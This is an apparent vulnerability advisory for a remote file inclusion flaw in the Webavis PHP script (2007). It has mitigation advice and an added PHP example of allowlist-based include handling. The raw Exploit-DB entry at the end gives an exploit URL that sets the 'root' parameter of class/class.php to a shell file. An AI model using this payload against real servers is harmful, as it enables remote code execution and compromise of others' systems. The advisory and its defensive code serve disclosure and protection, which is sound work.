Vendor: Webavis
By: ThE TiGeR
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Webavis
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Webavis Remote file inclusion (root)

The Webavis application is vulnerable to remote file inclusion. By setting the 'root' parameter in a request to 'class/class.php', an attacker can include arbitrary files from remote servers, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to properly sanitize and validate user input before using it in file inclusion functions. Additionally, the use of a Web Application Firewall (WAF) can help detect and prevent such attacks.
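
One way to apply the input-validation advice above, as an added example that is not Webavis code and not part of the original advisory. It assumes class.php builds include paths from a request-settable `root` value; the `module` parameter, the allowlisted file names and the directory layout are hypothetical.

```php
<?php
// Added example, not Webavis code. Assumption: the script builds include paths
// from a "root" value that a request can set. The "module" parameter and the
// file names below are hypothetical.
// Defence in depth: keep allow_url_include = Off in php.ini.

// The base directory is fixed on the server and never read from the request.
define('APP_ROOT', realpath(__DIR__));

// Allowlist mapping request-visible keys to files under APP_ROOT (hypothetical).
const ALLOWED_MODULES = [
    'config' => 'inc/config.php',
    'avis'   => 'inc/avis.php',
];

// Return the absolute path for an allowlisted module key, or throw.
function resolve_module(string $key): string
{
    if (!array_key_exists($key, ALLOWED_MODULES)) {
        throw new InvalidArgumentException('Unknown module key');
    }
    // realpath() resolves symlinks and "..", and returns false if the file is missing.
    $path = realpath(APP_ROOT . DIRECTORY_SEPARATOR . ALLOWED_MODULES[$key]);
    if ($path === false) {
        throw new RuntimeException('Module file not found');
    }
    // Containment check: the resolved file must stay below APP_ROOT.
    $prefix = APP_ROOT . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('Module path escapes application root');
    }
    return $path;
}

// A client-supplied "root" is never legitimate here: reject it instead of using it.
if (isset($_REQUEST['root'])) {
    http_response_code(400);
    exit('Bad request');
}

// The request only selects an allowlist key; it never contributes path text.
$module = isset($_GET['module']) && is_string($_GET['module']) ? $_GET['module'] : 'config';
try {
    require resolve_module($module);
} catch (Exception $e) {
    http_response_code(404);
    exit('Not found');
}
```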
Source

Exploit-DB raw data:

#Webavis Remote file inclusion (root)

#Download script : http://webavis.myreseau.org/src/webavis-0.1.1.tar.gz

#Thanks Str0ke :D

#Exploit :

#http://victim.com/webavis/class/class.php?root=shell.txt ?

#Discovered by ThE TiGeR

#Miro_Tiger[at]Hotmail.com

# milw0rm.com [2007-05-25]